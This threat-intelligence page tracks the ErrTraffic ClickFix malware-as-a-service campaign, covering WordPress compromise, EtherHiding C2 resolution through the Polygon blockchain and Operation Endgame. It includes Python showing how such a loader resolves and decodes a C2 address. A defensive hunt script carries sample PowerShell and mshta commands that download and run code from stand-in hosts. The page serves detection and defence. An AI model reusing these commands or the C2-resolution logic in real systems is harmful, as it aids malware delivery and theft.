ctipilot.ch

ErrTraffic

campaign · campaign:sekoia-errtraffic-clickfix-maas-polygon-c2 single-source

ErrTraffic — ClickFix MaaS distribution framework with EtherHiding/Polygon C2 resolution; EU WordPress targeting

Coverage timeline: 3 entries, first 2026-06-17, last 2026-06-22 (2 distinct days)
Sources cited: 4 (4 hosts)
Sections touched: 3 (research, weekly-long-running, weekly-research)
Co-occurring entities: 1

Story timeline

  1. 2026-06-22 [weekly-long-running] SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational
  2. 2026-06-22 [weekly-research] Research: ClickFix matured into a productised malware-as-a-service supply chain
  3. 2026-06-17 [research] Sekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain

Where this entity is cited

  • research: 1
  • weekly-research: 1
  • weekly-long-running: 1

Source distribution

  • blog.sekoia.io: 1 (25%)
  • huntress.com: 1 (25%)
  • malwarebytes.com: 1 (25%)
  • proofpoint.com: 1 (25%)

Entries about ErrTraffic (3)

2026-06-22

SocGholish / TA569 — Operation Endgame seized 106 servers, but seven delivery clusters remain operational

notable · synthesis · discovered 2026-06-22 00:15 UTC · single-source

key: item:operation-endgame-expands-to-socgholish-ta569-106-c2-servers. The Operation Endgame takedown (§ 5) was the headline; Proofpoint's post-action analysis is the status update that matters for the longer arc. TA569 served for years as a primary distribution layer for WastedLocker (Evil Corp), LockBit and RansomHub. Law enforcement seized over 100 servers and 14,971 WordPress sites were remediated, yet seven FakeUpdates-style clusters remain operational: TA2726, TA2727, ZPHP, ErrTraffic (the ClickFix MaaS in § 6), LandUpdate808/KongTuke, GeoTDS and tdsshop (Proofpoint, 2026-06-18; daily 06-19). Proofpoint also notes that WordPress sites frequently reinfect because the underlying credential compromise outlives CMS-level cleanup. The defender consequence: the fake-update initial-access vector is degraded, not closed. Keep GPO restrictions on JScript/WSH execution from user-writable paths and browser isolation for email links, and (for WordPress operators) pair any cleanup with full credential rotation (WordPress users, database, SFTP and hosting-panel credentials) plus file-integrity monitoring (FIM), because removing the loader without rotating credentials invites reinfection.

organized-crime law-enforcement supply-chain europe global

2026-06-22

Research: ClickFix matured into a productised malware-as-a-service supply chain

notable · research · discovered 2026-06-22 00:14 UTC

A second cross-day research thread: the ClickFix technique (fake browser/update dialogues that trick users into pasting attacker PowerShell) has industrialised. Sekoia documented ErrTraffic, a ClickFix Malware-as-a-Service framework that resolves its C2 through the Polygon blockchain (Sekoia, 2026-06-17; daily 06-17), and Huntress detailed the Potemkin loader delivering RMMProject RAT through a ClickFix chain that also bypasses Chromium App-Bound Encryption (Huntress, 2026-06-17; daily 06-17). ErrTraffic also surfaced as one of the SocGholish-adjacent clusters still operating after the Operation Endgame takedown (§ 8). The pattern for defenders: ClickFix is now a delivery channel with multiple competing operators and resilient C2, so user-paste-to-PowerShell detection is worth promoting from awareness training to a standing hunt: powershell.exe/mshta.exe invocations whose command line arrived via the clipboard (typically with explorer.exe as parent when the paste went through the Win+R Run dialog), and RunMRU artefacts (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records what was entered into that dialog).

phishing infostealer organized-crime global

2026-06-17

Sekoia: ErrTraffic — a ClickFix Malware-as-a-Service framework resolving C2 through the Polygon blockchain

notable · research · discovered 2026-06-17 05:14 UTC

ClickFix (fake browser/update dialogues that trick users into pasting attacker PowerShell) is maturing into a productised delivery channel, as this and the companion Huntress item in the same daily show. Sekoia's TDR team analysed ErrTraffic, a ClickFix distribution framework sold as MaaS by an actor using the handle "LenAI" on the Exploit.IN forum since at least December 2025 (Sekoia TDR, 2026-06-16). Affiliates compromise WordPress sites by credential-stuffing wp-login.php (one victim saw seven residential IPs in an 80-second window) or via WP File Manager CVE-2020-25213 (the unauthenticated arbitrary-file-upload flaw in the plugin's bundled elFinder connector, fixed in 6.9), then drop a PHP backdoor into wp-content/mu-plugins/ as session-manager.php, a must-use plugin that injects the ErrTraffic JavaScript into served pages. The JavaScript uses the EtherHiding technique, querying Polygon smart contracts through public RPC endpoints, to resolve C2 domains dynamically: sinkholing or seizing a C2 domain is undone by a single contract update, so conventional takedowns do not stick. It then serves ClickFix lures that drop Vidar, Stealc, SmokeLoader and others. ErrTraffic explicitly targets European and APAC visitors, putting public-sector WordPress portals in scope.
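To make the EtherHiding step concrete, here is an added example (this is not Sekoia's code and not ErrTraffic's actual contract) of what a blockchain C2 lookup looks like on the wire and how the contract's ABI-encoded string return is decoded. The contract address, the 4-byte function selector and the returned URL are placeholders chosen for illustration; a real campaign's values would come from the injected JavaScript, and a real contract might return bytes or a JSON blob rather than a bare string.

```python
"""Added example: EtherHiding-style C2 resolution via JSON-RPC eth_call.
Not Sekoia's or ErrTraffic's code; contract, selector and URL are placeholders."""
import json

# Assumed values for illustration only. The selector of a real contract is the
# first 4 bytes of keccak256(function signature) and would be read out of the
# loader script; no keccak is computed here.
CONTRACT = "0x" + "11" * 20      # placeholder 20-byte contract address
SELECTOR = "0xdeadbeef"          # placeholder 4-byte function selector


def build_eth_call(contract: str, selector: str, block: str = "latest") -> dict:
    """JSON-RPC body a loader POSTs to a public RPC endpoint to read contract
    state. eth_call needs no transaction, gas or wallet, so the lookup is free,
    anonymous and works through any of the many public RPC providers."""
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, block],
    }


def abi_encode_string(s: str) -> str:
    """ABI-encode a single `string` return value. Used only to construct the
    sample response offline; a real contract does this on-chain."""
    raw = s.encode()
    head = (32).to_bytes(32, "big")                # offset of the dynamic part
    length = len(raw).to_bytes(32, "big")          # byte length of the string
    padded = raw + b"\x00" * (-len(raw) % 32)      # right-pad to a 32-byte word
    return "0x" + (head + length + padded).hex()


def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` of an eth_call that returns a string:
    word 0 = offset, word at offset = length, then `length` bytes of data."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(data) < 64:
        raise ValueError("result too short for an ABI-encoded string")
    offset = int.from_bytes(data[:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    body = data[offset + 32:offset + 32 + length]
    if len(body) != length:
        raise ValueError("truncated ABI-encoded string")
    return body.decode()


def resolve_c2(rpc_response: dict) -> str:
    """Extract the C2 URL from a JSON-RPC response; an RPC error (for example a
    reverted call when the operator rotates the contract) is raised, not hidden."""
    if "error" in rpc_response:
        raise RuntimeError(f"rpc error: {rpc_response['error']}")
    return abi_decode_string(rpc_response["result"])


# Constructed sample exchange: the request the loader would send and the
# response the contract would return. The URL is a placeholder.
SAMPLE_REQUEST = build_eth_call(CONTRACT, SELECTOR)
SAMPLE_RESPONSE = {
    "jsonrpc": "2.0",
    "id": 1,
    "result": abi_encode_string("https://c2.example.invalid/gate"),
}

if __name__ == "__main__":
    print(json.dumps(SAMPLE_REQUEST))
    print("resolved C2:", resolve_c2(SAMPLE_RESPONSE))
```

The hunt value is in the request shape: a `"method":"eth_call"` POST to a public Polygon RPC endpoint, sent by a browser that has just loaded a WordPress page (or by the web-server process itself), is the observable that survives whichever C2 domain the contract currently returns.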

Why it matters to us: A reliable hunt artefact is the distinctive PowerShell comment block <# Code Verification: NNNNNNNNNNNN #> that Sekoia found at the start of ErrTraffic command strings. On the WordPress side, watch for new PHP files under wp-content/mu-plugins/ (loaded on every request without activation and not shown in the ordinary Plugins list), credential-stuffing bursts of many distinct source IPs against wp-login.php, and outbound requests from the web-server process to blockchain RPC endpoints. On the endpoint side, the same EtherHiding lookups show up as browser egress to public Polygon RPC endpoints (JSON-RPC eth_call POSTs, which is how contract state is read) immediately after a visit to a compromised site.
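As an added example (not Sekoia's or Proofpoint's tooling), the following runs two of the hunts from this entry and the weekly-research entry above over constructed sample data: the `<# Code Verification: ... #>` comment block plus generic ClickFix tells in command lines recovered from RunMRU values or process telemetry, and multi-IP credential-stuffing bursts against wp-login.php in an Apache combined access log. The sample RunMRU entries, IP addresses (documentation ranges) and log lines are constructed; the 12-digit code, the 80-second window and the seven-IP burst are taken from the page.

```python
"""Added example: ClickFix command-line hunt and wp-login.php burst detection.
Not Sekoia's or Proofpoint's code; all sample data below is constructed."""
import re
from datetime import datetime

# Sekoia's artefact: a PowerShell comment block at the start of the command.
# The page shows 12 digits; \d+ keeps the hunt tolerant to length changes.
CODE_VERIFICATION_RE = re.compile(r"<#\s*Code Verification:\s*(?P<code>\d+)\s*#>")

# Generic ClickFix tells with weights, so one benign match (an admin's own
# `iwr` in Run history) does not page anyone. Assumed weights, tune locally.
CLICKFIX_FLAGS = {
    "hidden_window":  (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), 1),
    "encoded_cmd":    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    "download_cradle":(re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b", re.I), 1),
    "pipe_to_iex":    (re.compile(r"\|\s*iex\b", re.I), 2),
    "mshta":          (re.compile(r"\bmshta(?:\.exe)?\b", re.I), 2),
}


def hunt_clickfix(entries, min_score=2):
    """entries: iterable of (source, command_line). Returns hits carrying the
    verification code (if present) and the flags that fired. The code block
    alone is high confidence; otherwise the weighted flags must reach min_score."""
    hits = []
    for source, cmd in entries:
        cmd = cmd.removesuffix("\\1")   # RunMRU values end in a literal "\1"
        m = CODE_VERIFICATION_RE.search(cmd)
        flags = [name for name, (rx, _) in CLICKFIX_FLAGS.items() if rx.search(cmd)]
        score = sum(CLICKFIX_FLAGS[f][1] for f in flags) + (3 if m else 0)
        if score >= min_score:
            hits.append({"source": source, "code": m["code"] if m else None,
                         "flags": flags, "score": score, "command": cmd})
    return hits


APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def wp_login_bursts(lines, window_s=80, min_ips=5):
    """Windows of window_s seconds in which at least min_ips distinct source IPs
    POST to wp-login.php. Sekoia's victim saw seven residential IPs in 80 s;
    one IP hammering the form is ordinary brute force and is left to rate limiting."""
    events = []
    for line in lines:
        m = APACHE_RE.match(line)
        if not m or m["method"] != "POST" or "wp-login.php" not in m["path"]:
            continue
        events.append((datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), m["ip"]))
    events.sort()
    bursts = []
    for i, (t0, _) in enumerate(events):
        ips = {ip for t, ip in events[i:] if (t - t0).total_seconds() <= window_s}
        if len(ips) >= min_ips:
            bursts.append((t0, ips))
    return bursts


# Constructed sample RunMRU values (HKCU\...\Explorer\RunMRU stores each entry
# with a trailing "\1"); the verification code and URLs are placeholders.
SAMPLE_RUNMRU = [
    ("RunMRU:a", r'powershell -w hidden -c "<# Code Verification: 483920165738 #> iwr https://cdn.example.invalid/v -UseBasicParsing | iex"\1'),
    ("RunMRU:b", r"notepad.exe C:\Users\alice\notes.txt\1"),
    ("RunMRU:c", r"mshta https://verify.example.invalid/check.hta\1"),
]

# Constructed Apache combined log: seven distinct IPs POST within 78 s, then a
# GET and a lone POST much later that must not count.
SAMPLE_ACCESS_LOG = [
    '198.51.100.11 - - [17/Jun/2026:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [17/Jun/2026:10:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Jun/2026:10:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '203.0.113.19 - - [17/Jun/2026:10:00:20 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '198.51.100.77 - - [17/Jun/2026:10:00:33 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '203.0.113.88 - - [17/Jun/2026:10:00:48 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [17/Jun/2026:10:01:19 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [17/Jun/2026:10:01:25 +0000] "GET /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [17/Jun/2026:10:30:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in hunt_clickfix(SAMPLE_RUNMRU):
        print(hit["source"], hit["score"], hit["code"], hit["flags"])
    for t0, ips in wp_login_bursts(SAMPLE_ACCESS_LOG):
        print(t0.isoformat(), len(ips), "distinct IPs")
```

The burst detector deliberately keys on distinct source IPs rather than request volume: residential-proxy credential stuffing of the kind Sekoia describes stays well under per-IP rate limits, and a volume threshold would miss it.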

supply-chain infostealer phishing cryptocrime europe apac